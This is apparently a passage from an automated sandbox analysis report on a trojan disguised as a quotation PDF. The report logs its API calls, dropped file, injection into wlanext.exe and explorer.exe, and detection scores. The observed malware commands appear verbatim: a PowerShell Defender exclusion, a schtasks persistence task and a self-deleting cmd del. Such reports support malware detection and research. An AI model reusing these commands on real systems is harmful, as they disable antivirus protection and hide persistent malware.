          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529540 NtReadFile,LdrInitializeThunk,19_2_03529540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035295D0 NtClose,LdrInitializeThunk,19_2_035295D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529B00 NtSetValueKey,19_2_03529B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0352A3B0 NtGetContextThread,19_2_0352A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529A10 NtQuerySection,19_2_03529A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529A00 NtProtectVirtualMemory,19_2_03529A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529A20 NtResumeThread,19_2_03529A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529A80 NtOpenDirectoryObject,19_2_03529A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529950 NtQueueApcThread,19_2_03529950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035299D0 NtCreateProcessEx,19_2_035299D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0352B040 NtSuspendThread,19_2_0352B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529820 NtEnumerateKey,19_2_03529820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035298F0 NtReadVirtualMemory,19_2_035298F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035298A0 NtWriteVirtualMemory,19_2_035298A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0352A770 NtOpenThread,19_2_0352A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529770 NtSetInformationFile,19_2_03529770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529760 NtOpenProcess,19_2_03529760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0352A710 NtOpenProcessToken,19_2_0352A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529730 NtQueryVirtualMemory,19_2_03529730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035297A0 NtUnmapViewOfSection,19_2_035297A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529670 NtQueryInformationProcess,19_2_03529670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529610 NtEnumerateValueKey,19_2_03529610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529560 NtWriteFile,19_2_03529560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0352AD30 NtSetContextThread,19_2_0352AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03529520 NtWaitForSingleObject,19_2_03529520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_035295F0 NtQueryInformationFile,19_2_035295F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328A350 NtCreateFile,19_2_0328A350
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328A530 NtAllocateVirtualMemory,19_2_0328A530
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328A400 NtReadFile,19_2_0328A400
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328A480 NtClose,19_2_0328A480
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328A34A NtCreateFile,19_2_0328A34A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328A52D NtAllocateVirtualMemory,19_2_0328A52D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328A484 NtClose,19_2_0328A484
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.748414866.0000000003A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.744721256.00000000007F6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRegist.exe> vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.751804560.0000000007290000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745031177.0000000000F2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRegist.exe> vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.746575972.0000000002B82000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745531520.0000000002A81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.837055363.000000000126F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000000.740634191.0000000000626000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRegist.exe> vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.836130531.00000000010DF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000003.745342764.0000000000F3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.838741595.00000000030D2000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exeBinary or memory string: OriginalFilenameRegist.exe> vs QUOTATION PDF_SCAN_COPY.exe
          Source: QUOTATION PDF_SCAN_COPY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: KHDScDG.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: QUOTATION PDF_SCAN_COPY.exeVirustotal: Detection: 42%
          Source: QUOTATION PDF_SCAN_COPY.exeMetadefender: Detection: 29%
          Source: QUOTATION PDF_SCAN_COPY.exeReversingLabs: Detection: 32%
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeFile read: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe:Zone.IdentifierJump to behavior
          Source: QUOTATION PDF_SCAN_COPY.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe"
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KHDScDG" /XML "C:\Users\user\AppData\Local\Temp\tmp2DBB.tmp
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KHDScDG.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KHDScDG" /XML "C:\Users\user\AppData\Local\Temp\tmp2DBB.tmpJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe"Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeFile created: C:\Users\user\AppData\Roaming\KHDScDG.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2DBB.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@14/8@0/0
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4680:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3532:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_01
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: QUOTATION PDF_SCAN_COPY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: QUOTATION PDF_SCAN_COPY.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: QUOTATION PDF_SCAN_COPY.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000003.744424237.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.836130531.00000000010DF000.00000040.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.835752890.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000003.744424237.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.836130531.00000000010DF000.00000040.00000800.00020000.00000000.sdmp, QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.835752890.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.838690431.00000000030C0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: zrsmwUxCy\src\obj\Debug\Regist.pdb source: QUOTATION PDF_SCAN_COPY.exe, 00000001.00000002.745031177.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\lzrsmwUxCy\src\obj\Debug\Regist.pdb source: QUOTATION PDF_SCAN_COPY.exe, KHDScDG.exe.1.dr
          Source: Binary string: wlanext.pdbGCTL source: QUOTATION PDF_SCAN_COPY.exe, 0000000B.00000002.838690431.00000000030C0000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: QUOTATION PDF_SCAN_COPY.exe, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: KHDScDG.exe.1.dr, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.0.QUOTATION PDF_SCAN_COPY.exe.770000.0.unpack, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 1.2.QUOTATION PDF_SCAN_COPY.exe.770000.0.unpack, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.5a0000.7.unpack, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.5a0000.3.unpack, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 11.2.QUOTATION PDF_SCAN_COPY.exe.5a0000.1.unpack, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.5a0000.5.unpack, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.5a0000.9.unpack, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 11.0.QUOTATION PDF_SCAN_COPY.exe.5a0000.1.unpack, LineNumberInfo/FormControl.cs.Net Code: Major System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 1_2_00773F6D push es; ret 1_2_00773F74
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 1_2_00773F43 push es; retn 0000h1_2_00773F4A
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_00416971 push 0622FF2Ah; iretd 11_2_0041697B
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041D4F2 push eax; ret 11_2_0041D4F8
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041D4FB push eax; ret 11_2_0041D562
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041D4A5 push eax; ret 11_2_0041D4F8
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_0041D55C push eax; ret 11_2_0041D562
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_005A3F43 push es; retn 0000h11_2_005A3F4A
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeCode function: 11_2_005A3F6D push es; ret 11_2_005A3F74
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0353D0D1 push ecx; ret 19_2_0353D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328DB3B pushfd ; retf 19_2_0328DB41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03286971 push 0622FF2Ah; iretd 19_2_0328697B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328D55C push eax; ret 19_2_0328D562
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328D4A5 push eax; ret 19_2_0328D4F8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328D4FB push eax; ret 19_2_0328D562
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0328D4F2 push eax; ret 19_2_0328D4F8
          Source: initial sampleStatic PE information: section name: .text entropy: 7.40361532396
          Source: initial sampleStatic PE information: section name: .text entropy: 7.40361532396
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeFile created: C:\Users\user\AppData\Roaming\KHDScDG.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KHDScDG" /XML "C:\Users\user\AppData\Local\Temp\tmp2DBB.tmp

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: /c del "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe"
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: /c del "C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exe"Jump to behavior
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION PDF_SCAN_COPY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
